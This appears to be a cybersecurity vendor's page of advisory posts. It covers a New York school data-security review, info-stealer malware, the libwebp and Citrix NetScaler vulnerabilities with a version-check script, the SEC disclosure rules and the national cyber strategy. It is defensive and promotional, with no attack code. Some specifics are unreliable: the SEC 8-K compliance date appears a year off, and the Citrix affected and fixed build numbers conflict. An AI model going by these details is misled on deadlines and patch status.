Security Updates

An aggregated collection of incoming security alerts, advisories, patches, and more so you’re prepared to respond to real-time threats.

In response to feedback received from various school districts, we have gathered the following information:

The New York State Education Department’s (NYSED) Information Security Office issued an important update impacting school districts throughout the state. Starting this spring, the NYSED Information Security Office will commence a comprehensive review of Local Education Agencies’ (LEAs) current data security controls in place to protect systems, applications, and data within school districts. The ultimate objective of this initiative is to enhance the overall security posture of LEAs in New York State.

Overview of NYSED’s LEA Data Security Review

The NYSED Information Security Office will contact LEAs to schedule virtual appointments for the data security review in January 2024. This timeframe will give LEAs enough time to review their current data security posture and ensure compliance before the review.

The regulatory frameworks guiding this assessment include Education Law § 2-d and Part 121 of the regulations of the Commissioner of Education, which outline what needs to be protected, and the NIST CSF, which provides guidance and measures to achieve a robust data security foundation. In connection with these compliance components, the review will encompass three key areas: Policies, Controls, and Third-Party Oversight. Each of these areas plays a pivotal role in safeguarding sensitive information and maintaining a secure digital environment.

Data Security Areas of Review at a Minimum

Policies

  • Acceptable Use
  • Password
  • Incident Response
  • Disaster Recovery
  • Privacy and Security

Controls

  • Multi-Factor Authentication (MFA)
  • Password Complexity
  • Users On/Off Boarding Process
  • Access Control (i.e., physical and electronic)
  • Privacy and Security Awareness Training
  • Back-ups (i.e., tested)
  • Patch Management

Third-Party Oversight

  • Type of Data Shared
  • How Data is Shared
  • Where Data is Stored
  • Access Controls on Data Sets
  • Configurations in Third-Party Environment

[Infographic: the three areas of NYSED's data security review, Policies, Controls, and Third-Party Oversight]

Potential Impact of the Data Security Review

In the event that questions or concerns arise during the data security review conducted for a given LEA, the NYSED Information Security Office will collaborate with the Superintendent and Data Protection Office. Together, they will formulate a plan of action to rectify and bolster any identified deficiencies.

Recommended Action Items

M.A. Polce’s cybersecurity team recommends the following proactive measures:

Review and Update Policies

  • Ensure that Acceptable Use, Password, Incident Response, Disaster Recovery, and Privacy and Security policies are up-to-date and align with industry best practices.

Enhance Security Controls

  • Strengthen MFA implementation.
  • Enforce robust password complexity standards.
  • Streamline Users On/Off Boarding Process.
  • Regularly review and update access controls.
  • Conduct Privacy and Security Awareness Training for staff.
  • Regularly test and validate backup systems.
  • Implement a robust patch management process.

Third-Party Collaboration

  • Review and document the type, manner, and location of data shared with third parties.
  • Ensure stringent access controls on data sets shared with external entities.
  • Verify and update configurations in third-party environments.

Priority Efforts to Engage

  • Collaborate with a cybersecurity services provider like M.A. Polce to conduct a comprehensive security assessment. This type of assessment will identify and address any potential gaps in your current security infrastructure.
  • Consider enrolling in an ongoing risk and compliance program, such as M.A. Polce’s Managed Risk and Compliance service, which provides a dedicated security roadmap for achieving compliance with applicable compliance frameworks and continuous strengthening of your organization’s security posture.

Preparing for the NYSED LEA Data Security Review

By proactively addressing these action items, your school district can demonstrate a commitment to data security and ensure a smooth review process by the NYSED Information Security Office. Should you require assistance implementing the proper data security controls, please do not hesitate to contact us. We are committed to supporting your school district in maintaining the highest standards of cybersecurity.

Surge in Info Stealer Malware Campaigns

Over the past year, the cybersecurity landscape has witnessed a marked surge in info stealer malware campaigns. These ongoing campaigns present an escalating threat to individuals and organizations alike. This update examines the latest trends in info stealer attacks, the role of Managed Detection and Response (MDR) services in preventing such threats, and offers practical measures for organizations to enhance their security posture.

Escalation of Info Stealer Malware

Info stealer malware, a category of malware built to pilfer sensitive information from infected systems, has seen a notable uptick in sophistication and prevalence over the past year. On a compromised machine it typically targets:

  • Browser data
  • Cryptocurrency wallets
  • Saved credit card data
  • Discord tokens
  • Telegram sessions
  • System information

We’re seeing cyber adversaries adapt to modern security measures, utilizing increasingly sophisticated techniques to infiltrate networks and exfiltrate invaluable data.

Modus Operandi

  • Phishing Prowess: Malicious actors often leverage sophisticated phishing campaigns, using social engineering tactics to deceive users into revealing confidential information.
  • Fileless Attacks: Info Stealer malware has become adept at employing fileless techniques, evading traditional antivirus measures by residing in system memory.

Targets and Payloads

  • Corporate Environments: Businesses across industries have fallen victim to info stealer campaigns, with cybercriminals targeting intellectual property, proprietary information, and financial records.
  • Personal Data: Individuals are at risk as personal information, login credentials, and financial data become prime targets for exploitation.

The Crucial Role of MDR in Info Stealer Prevention

Managed Detection and Response services have become indispensable in the battle against Info Stealer malware, employing a multifaceted approach to identify, isolate, and eradicate these threats.

Continuous Monitoring

MDR services employ real-time monitoring, analyzing network and endpoint activities for anomalous patterns indicative of Info Stealer infections.

Behavioral Analytics

Utilizing advanced behavioral analytics, MDR platforms can identify deviations from normal user behavior, swiftly detecting potential Info Stealer activities.

Threat Hunting

MDR experts engage in proactive threat hunting, actively searching for signs of potential Info Stealer malware that may have evaded automated detection systems.

Endpoint Protection

MDR solutions often incorporate Endpoint Detection and Response (EDR) capabilities, allowing for quick response and containment at the endpoint level.

Threat Intelligence Integration

By leveraging threat intelligence feeds, MDR services stay updated on the latest Info Stealer variants and tactics, enhancing their ability to anticipate and respond to emerging threats.

Info Stealer Malware Prevention Beyond MDR

While MDR is a critical component of a comprehensive security strategy, organizations can take additional steps to fortify their defenses against Info Stealer malware.

Employee Training and Awareness

Conduct regular cybersecurity training sessions at your organization to educate employees about the risks associated with phishing attacks and the importance of avoiding suspicious emails and attachments.

Endpoint Security Solutions

Implement robust endpoint security solutions that include antivirus, anti-malware, and firewall protection to create multiple layers of defense against Info Stealer infections.

Regular Software Updates

Keep operating systems, applications, and security software up-to-date to patch vulnerabilities that could be exploited by Info Stealers.

Network Segmentation

Employ network segmentation to limit lateral movement within the network, reducing the potential impact of an Info Stealer infection.

Data Encryption

Implement encryption protocols to protect sensitive data, rendering it less accessible even if an Info Stealer gains unauthorized access.

The Impact of Info Stealer Malware: A Client’s Nightmare

Experiencing this type of malware can have severe consequences, including financial losses and damage to one’s reputation.

Financial Fallout

Stolen financial information can result in unauthorized transactions, leading to direct monetary losses for both individuals and businesses.

Reputational Damage

For businesses, a breach of confidential data can damage customer confidence, causing harm to the organization’s reputation, which may take a long time to recover.

Regulatory Consequences

Furthermore, regulatory bodies often impose fines and penalties for data breaches, especially when sensitive client information is compromised.

Protect Your Organization Against Info Stealer Malware

In sum, as Info Stealer malware evolves and scales, the role of MDR becomes increasingly paramount in safeguarding against these insidious threats. By embracing advanced detection mechanisms, threat intelligence integration, and rapid incident response, MDR services stand as a stalwart defense, protecting organizations from the potentially devastating impacts of Info Stealer malware.

If you want to protect your organization against sophisticated malware attacks, it’s important to partner with a reliable MDR provider. M.A. Polce provides a comprehensive suite of cybersecurity solutions, including MDR. Contact us today if you want to put the proper measures in place to protect your operations from cyber threats.

Sources

Verizon 2023 Data Breach Investigations Report
CrowdStrike 2023 Global Threat Report
SOC Prime
Cybersecurity and Infrastructure Security Agency (CISA) and FBI
Malwarebytes Labs

Overview of the libwebp Vulnerability

A zero-day vulnerability in the libwebp image library, used for rendering images in WebP format, is currently being exploited. Google identified it as CVE-2023-5129, with a maximum CVSS score of 10. The flaw was initially attributed to Chrome alone (CVE-2023-4863), but it has since been clarified that it affects all software that uses the libwebp library.

The vulnerability is critical, affecting nearly all operating systems and applications using the libwebp library, including those built on Electron (a Cross-Platform Development Framework using Chromium and Node.js).

How the libwebp Vulnerability Works

The attack is complex: a specially crafted WebP lossless file causes libwebp to write data beyond the bounds of a heap buffer, which an attacker can leverage for further exploitation.

Top Three Reasons the libwebp Vulnerability is so Severe

The libwebp vulnerability (CVE-2023-5129) is severe for three reasons.

Firstly, the vulnerability affects any software that uses the WebP codec, including major browsers like Chrome, Firefox, Safari, and Edge and a host of additional apps. This makes the impact of the vulnerability extremely broad.

Secondly, successful exploitation of the vulnerability could potentially result in attackers taking control of a system, executing arbitrary code, and gaining unauthorized access to confidential user data, making the impact of exploitation extremely serious.

Lastly, attackers are already actively exploiting the flaw. Google acknowledged earlier this month that CVE-2023-4863 was being exploited in the wild. The vulnerability has also been linked to Citizen Lab’s September 7 “BLASTPASS” report disclosing a zero-click, zero-day iMessage exploit captured in the wild.

Patching the libwebp Flaw

Given the severity of the libwebp vulnerability and the active exploitation already confirmed, it’s crucial for admins to take immediate steps to safeguard their networks. One of the key measures is to patch any vulnerable apps as soon as updates become available. Then, confirm the successful application of the patches. However, since the complete list of affected applications is still unknown, it’s difficult to take preventive measures for every vulnerable app. Hopefully, additional vendors will soon share more information about the impacted applications.

Google has recommended that organizations apply patches promptly to prevent exploitation. Google Chrome versions before 116.0.5845.187 and older Electron versions are vulnerable.

Apps with patches available for CVE-2023-5129 are listed in this NinjaOne blog post.

Michael Taggart, a security professional and threat hunter, has compiled an extensive list of apps affected by CVE-2023-5129 and is updating it regularly.

Keep Your Network Secure with M.A. Polce

Partnering with a reliable managed IT services provider like M.A. Polce can help businesses maintain a secure network, especially when it comes to IT security services such as regular patch management and expert support. With the recent rise in zero-day security vulnerabilities like the libwebp flaw, it’s more important than ever to have a trusted partner who can provide proactive solutions to keep your business secure. M.A. Polce’s team of experts can offer a range of services that help prevent and mitigate security risks, so you can focus on what matters most – running your business. Contact us today to learn about our options for securing your business network.

Sources

https://www.ninjaone.com/blog/webp-0-day-how-to-identify-vulnerable-apps-cve-2023-5129/

https://www.bleepingcomputer.com/news/security/google-assigns-new-maximum-rated-cve-to-libwebp-bug-exploited-in-attacks/

The Securities and Exchange Commission (SEC) has introduced new cybersecurity disclosure requirements, referred to as the “Final Rules,” which apply to all types of SEC filers, including domestic issuers, foreign private issuers (FPIs), smaller reporting companies, and emerging growth companies. The rules were adopted on July 26, 2023, and are effective September 5, 2023. Above all, these rules aim to enhance transparency and governance in cybersecurity for public companies.

Disclosure of Material Cybersecurity Incidents (Form 8-K):

Domestic issuers must file a Current Report on Form 8-K within four business days after discovering a material cybersecurity incident. Specifically, the disclosure should include details on the incident’s nature, scope, timing, and its material impact on the issuer’s financial condition and results of operations. The definition of “cybersecurity incident” is broad, covering a series of related unauthorized occurrences. Delay in reporting is allowed only if the U.S. Attorney General determines that immediate disclosure threatens national security or public safety.

Key Takeaway on Disclosing Cyber Incidents

It is crucial for public companies to establish internal processes that can help determine whether a cybersecurity incident is material and document all the necessary facts related to the incident.

Due to the disclosure timeline requirements, companies must prepare in advance to carry out these assessments and disclosures. This holds even if the cybersecurity incident is still ongoing. So, the security, legal, and corporate communication teams of public companies must work together to adapt their cyber incident response strategies and financial reporting processes to meet these obligations.

Disclosure of Material Cybersecurity Incidents (Form 6-K):

Foreign private issuers must furnish a Form 6-K to the SEC if they disclose material cybersecurity incidents in a foreign jurisdiction to stock exchanges or security holders.

Compliance Dates:

Most issuers must comply with the cybersecurity incident disclosure requirements by December 18, 2024 (or later if specified in the Federal Register). However, smaller reporting companies have an additional 180 days for compliance.

Cybersecurity Risk Management, Strategy, and Governance Disclosure (Form 10-K and 20-F):

A new Item 106 to Regulation S-K requires annual disclosures in Form 10-K and 20-F reports about cybersecurity governance, risk management, and strategy. Issuers must describe their risk management processes for cybersecurity threats and assess their impact on business strategy, results, and financial condition. Governance-related disclosures should identify board committees overseeing cybersecurity risks and describe management’s role in managing these risks.

Compliance Dates for Risk Management, Strategy, and Governance Disclosure:

All issuers, including smaller reporting companies and emerging growth companies, must comply with Item 106 starting with annual reports for fiscal years ending on or after December 15.

Disclosures in Inline eXtensible Business Reporting Language (XBRL):

New disclosure requirements must be tagged in XBRL format starting on December 18, 2024 (or later if specified in the Federal Register).

Action Items for Companies:

  • Board discussions on the new disclosure requirements and cybersecurity updates.
  • Develop or enhance strategies, policies, and procedures for managing and mitigating cybersecurity risks.
  • Regularly assess and update cybersecurity policies and procedures to align with industry standards.

These new SEC cybersecurity disclosure requirements aim to bolster transparency, governance, and preparedness in addressing cybersecurity risks for public companies. The adoption of these new rules could signal that greater federal cybersecurity enforcement actions are imminent. Consequently, this could mean that corporate leaders can expect to face increased personal liability and regulatory scrutiny risks. Thus, it is essential for affected companies to take proactive steps to ensure compliance and strengthen their cybersecurity practices.

How M.A. Polce Can Help

The SEC’s new cybersecurity disclosure requirements raise the stakes for business leaders. As a trusted IT security company, M.A. Polce can assist businesses impacted by the new SEC cybersecurity disclosure requirements. Our team can conduct thorough cybersecurity assessments, develop robust incident response plans, establish effective risk management processes, and enhance governance structures to ensure compliance. We offer comprehensive cybersecurity solutions including technical defenses and continuous monitoring. Additionally, we can provide tailored training and awareness programs for your staff and board members. Take proactive steps to strengthen your cybersecurity posture and meet SEC requirements by partnering with M.A. Polce. Contact us today to ensure your business is well-prepared to address evolving cybersecurity expectations.

Overview of CVE-2023-3519 Vulnerability

A recent Citrix alert warns of multiple vulnerabilities impacting Citrix NetScaler ADC and NetScaler Gateway products. Of those vulnerabilities, only CVE-2023-3519 is of critical severity, with a CVSS score of 9.8. CVE-2023-3519 is an unauthenticated remote code execution (RCE) vulnerability that is now being exploited in the wild and could potentially affect multiple versions of these products.

Given that CVE-2023-3519 allows threat actors to drop a web shell in an environment, the vulnerability gives them a foothold to perform discovery, exfiltration, and other follow-on activity. A patch is now available from Citrix to mitigate the threat.

What Appliance Versions Does CVE-2023-3519 Affect?

According to CISA, only those appliances set up as a Gateway (whether it is VPN virtual server, ICA Proxy, CVPN, or RDP Proxy) or as an AAA (authentication, authorization, and auditing) virtual server are vulnerable to exploitation.

The NetScaler ADC and NetScaler Gateway versions impacted by the vulnerability include the following:

  • NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.13
  • NetScaler ADC and NetScaler Gateway 13.0 before 13.0-91.13
  • NetScaler ADC and NetScaler Gateway version 12.1, now end of life
  • NetScaler ADC 13.1-FIPS before 13.1-37.159
  • NetScaler ADC 12.1-FIPS before 12.1-65.36
  • NetScaler ADC 12.1-NDcPP before 12.65.36

Installing the following software versions as soon as possible is essential to mitigate the vulnerability within your environment. You can follow the steps outlined in Citrix’s Security Bulletin.

What Software Versions Mitigate the CVE-2023-3519 Vulnerability?

The software versions needed to mitigate the vulnerability include:

  • NetScaler ADC and NetScaler Gateway 13.1-49.13 and later releases
  • NetScaler ADC and NetScaler Gateway 13.0-91.13 and later releases of 13.0
  • NetScaler ADC 13.1-FIPS 13.1-37.159 and later releases of 13.1-FIPS
  • NetScaler ADC 12.1-FIPS 12.1-55.297 and later releases of 12.1-FIPS
  • NetScaler ADC 12.1-NDcPP 12.1-55.297 and later releases of 12.1-NDcPP
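The check below, an added example rather than Citrix's own tooling, turns the fixed-build list above into an inventory triage: it parses NetScaler version strings (hyphenated form and the "NS13.1: Build 49.13.nc" form printed by `show version`) and reports whether each appliance is at or above the fixed build for its branch. The hostnames and versions are constructed; the assumption that a FIPS/NDcPP build may need its variant passed explicitly is mine, and the check does not cover CISA's note that only Gateway- or AAA-configured appliances are exposed.

```python
import re

# Minimum fixed build per release branch, taken from the Citrix list above.
# Key: (release, variant); variant "" is the standard ADC/Gateway build.
FIXED_BUILDS = {
    ("13.1", ""):      (49, 13),
    ("13.0", ""):      (91, 13),
    ("13.1", "FIPS"):  (37, 159),
    ("12.1", "FIPS"):  (55, 297),
    ("12.1", "NDcPP"): (55, 297),
}
# Standard 12.1 builds are end of life: there is no fixed build to upgrade to.
END_OF_LIFE = {("12.1", "")}

# Matches "13.1-49.13", "12.1-FIPS 12.1-55.297" and "NS13.1: Build 49.13.nc".
VERSION_RE = re.compile(r"(\d+\.\d+)[-:\s]+(?:Build\s+)?(\d+)\.(\d+)")
VARIANT_RE = re.compile(r"\b(FIPS|NDcPP)\b", re.IGNORECASE)
VARIANT_NAMES = {"fips": "FIPS", "ndcpp": "NDcPP"}


def parse_version(text, variant=None):
    """Return (release, variant, (build_major, build_minor)) or None.

    `variant` can be given explicitly because a FIPS/NDcPP appliance does not
    necessarily print the word in its version string (assumption).
    """
    m = VERSION_RE.search(text)
    if not m:
        return None
    release = m.group(1)
    build = (int(m.group(2)), int(m.group(3)))
    if variant is None:
        v = VARIANT_RE.search(text)
        variant = VARIANT_NAMES[v.group(1).lower()] if v else ""
    return release, variant, build


def assess(text, variant=None):
    """Classify one version string against the CVE-2023-3519 fixed builds.

    Returns "fixed", "vulnerable", "end-of-life", "unknown-release" or
    "unparseable". Builds compare as integer tuples, so 49.13 is correctly
    newer than 49.9 even though "49.9" sorts later as text.
    """
    parsed = parse_version(text, variant)
    if parsed is None:
        return "unparseable"
    release, var, build = parsed
    key = (release, var)
    if key in END_OF_LIFE:
        return "end-of-life"
    if key not in FIXED_BUILDS:
        return "unknown-release"
    return "fixed" if build >= FIXED_BUILDS[key] else "vulnerable"


def triage(inventory):
    """Map hostname -> status for a dict of hostname -> version string."""
    return {host: assess(ver) for host, ver in inventory.items()}


if __name__ == "__main__":
    # Constructed inventory: hostnames and versions are made up for the demo.
    sample = {
        "ns-gw-01":   "NS13.1: Build 48.47.nc",
        "ns-gw-02":   "NS13.1: Build 49.13.nc",
        "ns-lb-03":   "NetScaler ADC 13.0-91.12",
        "ns-old-04":  "NS12.1: Build 65.25.nc",
        "ns-fips-05": "NetScaler ADC 12.1-FIPS 12.1-55.297",
    }
    for host, status in triage(sample).items():
        print(f"{host:12s} {status}")
```

Anything reported as "vulnerable" or "end-of-life" should be patched or replaced per the bulletin, and a "fixed" result only confirms the build, not that a web shell was not already dropped before the upgrade.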

Citrix is notifying customers and channel partners about this potential security issue through its security bulletin on the Citrix Knowledge Center at https://support.citrix.com/securitybulletins.

Managing the Security of Your Applications

If your organization could use assistance managing the security of its IT devices and applications, contact M.A. Polce today. M.A. Polce is a leading provider of managed IT and cybersecurity services in New York State. By outsourcing technology tasks to a company like M.A. Polce, your organization can focus on core business objectives while ensuring its security is modern and comprehensive.

Sources

https://support.citrix.com/article/CTX561482/citrix-adc-and-citrix-gateway-security-bulletin-for-cve20233519-cve20233466-cve20233467

https://thehackernews.com/2023/07/zero-day-attacks-exploited-critical.html

Overview: A Roadmap for the National Cybersecurity Strategy

The White House released its implementation plan for the National Cybersecurity Strategy (the Strategy) unveiled in March 2023. The plan provides a roadmap outlining how the Nation will achieve the President’s vision for cyber resilience in America.

Overall, the primary purpose of the publication is to pave the path for achieving two significant shifts: more capable actors in cyberspace to bear more of the responsibility for cybersecurity and increased incentives to make investments in long-term resilience. In other words, it serves to help secure cyberspace and ensure that the United States can fully benefit from its digital future.

As the first iteration of the Implementation Plan, it’s a living document meant to be updated in concert with the evolving cyber landscape.

The National Cybersecurity Strategy

The Strategy, consisting of five pillars and 27 strategic objectives, addresses the importance of cybersecurity and how it impacts various aspects of American life, such as the economy, critical infrastructure, democracy, privacy, and national defense. Additionally, it emphasizes the need for collaboration between the public and private sectors to achieve effective and equitable cybersecurity. It also aims to shift responsibility from individual users and small organizations to encourage long-term investments in security and resilience.

What are the Main Components of the Implementation Plan?

In alignment with the Strategy, the 57-page Implementation Plan details the Strategy’s five key pillars, their related strategic objectives, and the sub-initiatives under each, all of which provide a means to achieve a wide range of goals for the future of cybersecurity in America. The plan comes with more than 65 initiatives assigned to 18 federal agencies, with timelines for completion.

Pillar One: Defend Critical Infrastructure

To begin, Pillar One consists of five strategic objectives, including 16 sub-initiatives. Overall, it focuses on the universal implementation of baseline configurations, the development of Incident Response Plans and Processes, and the implementation of federal cybersecurity centers.

Strategic Objective 1.1: Establish Cybersecurity Requirements to Support National Security and Public Safety

  • Strategic Initiative 1.1.1: Establish an initiative on cyber regulatory harmonization
  • Strategic Initiative 1.1.2: Set cybersecurity requirements across critical infrastructure sectors
  • Strategic Initiative 1.1.3: Increase agency use of frameworks and international standards to inform regulatory alignment

 

Strategic Objective 1.2: Scale Public-Private Collaboration

  • Strategic Initiative 1.2.1: Scale public-private partnerships to drive development and adoption of secure-by-design and secure-by-default technology
  • Strategic Initiative 1.2.2: Provide recommendations for the designation of critical infrastructure sectors and SRMAs
  • Strategic Initiative 1.2.3: Evaluate how CISA can leverage existing reporting mechanisms or the potential creation of a single portal to integrate and operationalize SRMAs’ sector-specific systems and processes
  • Strategic Initiative 1.2.4: Investigate opportunities for new and improved information-sharing and collaboration platforms, processes, and mechanisms.
  • Strategic Initiative 1.2.5: Establish an SRMA support capability

 

Strategic Objective 1.3: Integrate Federal Cybersecurity Centers

  • Strategic Initiative 1.3.1: Assess and improve Federal Cybersecurity Centers’ and related cyber centers’ capabilities and plans necessary for collaboration at speed and scale.

 

Strategic Objective 1.4: Update Federal Incident Response Plans and Processes

  • Strategic Initiative 1.4.1: Update the National Cyber Incident Response Plan (NCIRP)
  • Strategic Initiative 1.4.2: Issue final Cyber Incident Reporting for Critical Infrastructure Act (CIRCIA) rule
  • Strategic Initiative 1.4.3: Develop exercise scenarios to improve cyber incident response
  • Strategic Initiative 1.4.4: Draft legislation to codify the Cyber Safety Review Board (CSRB) with the required authorities

 

Strategic Objective 1.5: Modernize Federal Defenses

  • Strategic Initiative 1.5.1: Secure unclassified Federal Civilian Executive Branch (FCEB) systems
  • Strategic Initiative 1.5.2: Modernize Federal Civilian Executive Branch (FCEB) technology
  • Strategic Initiative 1.5.3: Secure National Security Systems (NSS) at Federal Civilian Executive Branch (FCEB) agencies

 

Pillar Two: Disrupt and Dismantle Threat Actors

Next, Pillar Two consists of five strategic objectives and 14 strategic sub-initiatives. In all, this pillar aims to strengthen the National Cyber Investigative Joint Task Force’s capacity and to expand the other organizations whose missions overlap with it. Furthermore, it acknowledges that with increased power comes the responsibility to take down threat actors and to support organizations that fall victim to ransomware or other cybercrimes.

Strategic Objective 2.1: Integrate Federal Disruption Activities

  • Strategic Initiative 2.1.1: Publish an updated DOD Cyber Strategy
  • Strategic Initiative 2.1.2: Strengthen the National Cyber Investigative Joint Task Force (NCIJTF) capacity
  • Strategic Initiative 2.1.3: Expand organizational platforms dedicated to disruption campaigns
  • Strategic Initiative 2.1.4: Propose legislation to disrupt and deter cybercrime and cyber-enabled crime
  • Strategic Initiative 2.1.5: Increase speed and scale of disruption operations

 

Strategic Objective 2.2: Enhance Public-Private Operational Collaboration to Disrupt Adversaries

  • Strategic Initiative 2.2.1: Identify mechanisms for increased adversarial disruption through public-private operational collaboration

 

Strategic Objective 2.3: Increase the Speed and Scale of Intelligence Sharing and Victim Notifications

  • Strategic Initiative 2.3.1: Identify and operationalize sector-specific intelligence needs and priorities.
  • Strategic Initiative 2.3.2: Remove barriers to delivering cyber threat intelligence and data to critical infrastructure owners and operators

 

Strategic Objective 2.4: Prevent Abuse of U.S.-Based Infrastructure

  • Strategic Initiative 2.4.1: Publish a Notice of Proposed Rulemaking on requirements, standards, and procedures for Infrastructure-as-a-Service (IaaS) providers and resellers

 

Strategic Objective 2.5: Counter Cybercrime, Defeat Ransomware

  • Strategic Initiative 2.5.1: Disincentivize safe havens for ransomware criminals
  • Strategic Initiative 2.5.2: Disrupt ransomware crimes
  • Strategic Initiative 2.5.3: Investigate ransomware crimes and disrupt the ransomware ecosystem.
  • Strategic Initiative 2.5.4: Support Private sector and state, local, Tribal, and territorial (SLTT) efforts to mitigate ransomware risk.
  • Strategic Initiative 2.5.5: Support other countries’ efforts to adopt and implement the global anti-money laundering/countering the financing of terrorism (AML/CFT) standards for virtual asset service providers.

 

Pillar Three: Shape Market Forces to Drive Security and Resilience

Thirdly, Pillar Three comprises five strategic objectives and 11 strategic sub-initiatives. This portion of the plan prioritizes the security of devices and services and also holds those who produce them accountable for the risk they might present. By using federal grants and other incentives, it pushes developers to prioritize security at the design stage of a product rather than after it has been released. Additionally, Pillar Three highlights the importance of Cyber Liability Insurance for a catastrophic cyber event.

Strategic Objective 3.2: Drive the Development of Secure IoT Devices

  • Strategic Initiative 3.2.1: Implement Federal Acquisition Regulation (FAR) requirements per the Internet of Things (IoT) Cybersecurity Improvement Act of 2020
  • Strategic Initiative 3.2.2: Initiate a U.S. Government IoT security labeling program

 

Strategic Objective 3.3: Shift Liability for Insecure Software Products and Services

  • Strategic Initiative 3.3.1: Explore approaches to develop a long-term, flexible, and enduring software liability framework
  • Strategic Initiative 3.3.2: Advance software bill of materials (SBOM) and mitigate the risk of unsupported software
  • Strategic Initiative 3.3.3: Coordinated vulnerability disclosure

 

Strategic Objective 3.4: Use Federal Grants and Other Incentives to Build in Security

  • Strategic Initiative 3.4.1: Leverage Federal grants to improve infrastructure cybersecurity
  • Strategic Initiative 3.4.2: Prioritize funding for cybersecurity research
  • Strategic Initiative 3.4.3: Prioritize cybersecurity research, development, and demonstration on social, behavioral, and economic research in cybersecurity

 

Strategic Objective 3.5: Leverage Federal Procurement to Improve Accountability

  • Strategic Initiative 3.5.1: Implement Federal Acquisition Regulation (FAR) changes required under EO 14028
  • Strategic Initiative 3.5.2: Leverage the False Claims Act to improve vendor cybersecurity

 

Strategic Objective 3.6: Explore a Federal Cyber Insurance Backstop

  • Strategic Initiative 3.6.1: Assess the need for a federal insurance response to a catastrophic cyber event

 

Pillar Four: Invest in a Resilient Future

Then, Pillar Four entails five strategic objectives and 13 strategic sub-initiatives. It sets the tone for what the future holds in terms of strategy and security by developing network security best practices and building training, tools, and support for engineers and technicians using cyber-informed engineering principles.

Strategic Objective 4.1: Secure the Technical Foundation of the Internet

  • Strategic Initiative 4.1.1: Lead the adoption of network security best practices
  • Strategic Initiative 4.1.2: Promote open-source software security and the adoption of memory safe programming languages
  • Strategic Initiative 4.1.3: Accelerate the development, standardization, and adoption of foundational Internet infrastructure capabilities and technologies
  • Strategic Initiative 4.1.4: Accelerate the development and standardization, and support the adoption, of foundational internet infrastructure capabilities and technologies
  • Strategic Initiative 4.1.5: Collaborate with key stakeholders to drive secure Internet routing

 

Strategic Objective 4.2: Reinvigorate Federal Research and Development for Cybersecurity

  • Strategic Initiative 4.2.1: Accelerate maturity, adoption, and security of memory-safe programming languages

 

Strategic Objective 4.3: Prepare for Our Post-Quantum Future

  • Strategic Initiative 4.3.1: Implement National Security Memorandum-10
  • Strategic Initiative 4.3.2: Implement NSM-10 for National Security Systems (NSS)
  • Strategic Initiative 4.3.3: Standardize, and support the transition to, post-quantum cryptography algorithms.

 

Strategic Objective 4.4: Secure Our Clean Energy Future

  • Strategic Initiative 4.4.1: Drive adoption of cyber secure-by-design principles by incorporating them into Federal projects
  • Strategic Initiative 4.4.2: Develop a plan to ensure the digital ecosystem can support and deliver the U.S. Government’s decarbonization goals
  • Strategic Initiative 4.4.3: Build and refine training, tools, and support for engineers and technicians using cyber-informed engineering principles

 

Strategic Objective 4.6: Develop a National Strategy to Strengthen Our Cyber Workforce

  • Strategic Initiative 4.6.1: Publish a National Cyber Workforce and Education Strategy and track its implementation

 

Pillar Five: Forge International Partnerships to Pursue Shared Goals

Finally, Pillar Five includes five strategic objectives with 12 strategic sub-initiatives. Simply put, this pillar promotes collaboration with other countries and allied partners to advance common cybersecurity interests. These partnerships can help identify weaknesses, strengthen international partners’ cyber capacity, and promote a more diverse and resilient supply chain of trustworthy information and communication technology vendors.

Strategic Objective 5.1: Build Coalitions to Counter Threats to our Digital Ecosystem

  • Strategic Initiative 5.1.1: Create interagency teams for regional cyber collaboration and coordination
  • Strategic Initiative 5.1.2: Publish an International Cyberspace and Digital Policy Strategy
  • Strategic Initiative 5.1.3: Strengthen Federal law enforcement collaboration mechanisms with allies and partners
  • Strategic Initiative 5.1.4: Regional cyber hubs study

 

Strategic Objective 5.2: Strengthen International Partner Capacity

  • Strategic Initiative 5.2.1: Strengthen international partners’ cyber capacity
  • Strategic Initiative 5.2.2: Expand international partners’ cyber capacity through operational law enforcement collaboration

 

Strategic Objective 5.3: Expand U.S. Ability to Assist Allies and Partners

  • Strategic Initiative 5.3.1: Establish flexible foreign assistance mechanisms to provide cyber incident response support quickly

 

Strategic Objective 5.4: Build Coalitions to Reinforce Global Norms of Responsible State Behavior

  • Strategic Initiative 5.4.1: Hold irresponsible states accountable when they fail to uphold their commitments

 

Strategic Objective 5.5: Secure Global Supply Chains for Information, Communications, and Operational Technology Products and Services

  • Strategic Initiative 5.5.1: Promote the development of secure and trustworthy information and communication technology (ICT) networks and services
  • Strategic Initiative 5.5.2: Promote a more diverse and resilient supply chain of trustworthy information and communication (ICT) vendors
  • Strategic Initiative 5.5.3: Begin administering the Public Wireless Supply Chain Innovation Fund (PWSCIF)
  • Strategic Initiative 5.5.4: Promulgate and amplify Cybersecurity Supply Chain Risk Management (C-SCRM) key practices across and within critical infrastructure sectors

 

Implementation-wide Initiatives

Lastly, a sixth component of the plan highlights the importance of reviewing progress and applying lessons learned throughout the implementation of the National Cybersecurity Strategy roadmap.

Implementation 6.1: Assessing Effectiveness

  • Initiative 6.1.1: Report progress and effectiveness on implementing the National Cybersecurity Strategy
  • Initiative 6.1.2: Apply lessons learned to the National Cybersecurity Strategy implementation
  • Initiative 6.1.3: Align budgetary guidance with National Cybersecurity Strategy implementation.

 

What Does the Implementation Plan Mean for Other Organizations?

The release of the National Cybersecurity Strategy Implementation Plan by the White House has significant implications for commercial businesses, state and local governments, school districts, and other organizations in the United States. This plan outlines the government’s strategy and actions to strengthen the nation’s cybersecurity defenses and protect critical infrastructure from cyber threats.

The release of the National Cybersecurity Strategy Implementation Plan should be of great importance to all organizations because:

  • Improved Cybersecurity Defense: The plan outlines strategies to enhance the nation’s cybersecurity capabilities, which will benefit organizations by providing a safer digital environment.
  • Regulatory Compliance: Organizations may need to comply with new cybersecurity regulations resulting from the implementation plan, which could impact their operations and reputations.
  • Collaborative Approach: Organizations that participate in public-private partnerships may gain access to valuable threat intelligence and resources to bolster their cybersecurity defenses.
  • Protection of Critical Infrastructure: The plan’s focus on protecting critical infrastructure helps ensure the continuity of essential services during cyber incidents.

 
Ultimately, the release of the National Cybersecurity Strategy Implementation Plan reflects the government’s commitment to addressing cyber threats at a national level. In light of this historical development, organizations should closely monitor its impact on their industries and be prepared to adapt their cybersecurity practices to align with the evolving strategies and initiatives set forth by the plan.

To review the National Cybersecurity Strategy Implementation Plan in greater detail, click here.

How to Address Cybersecurity at Your Organization

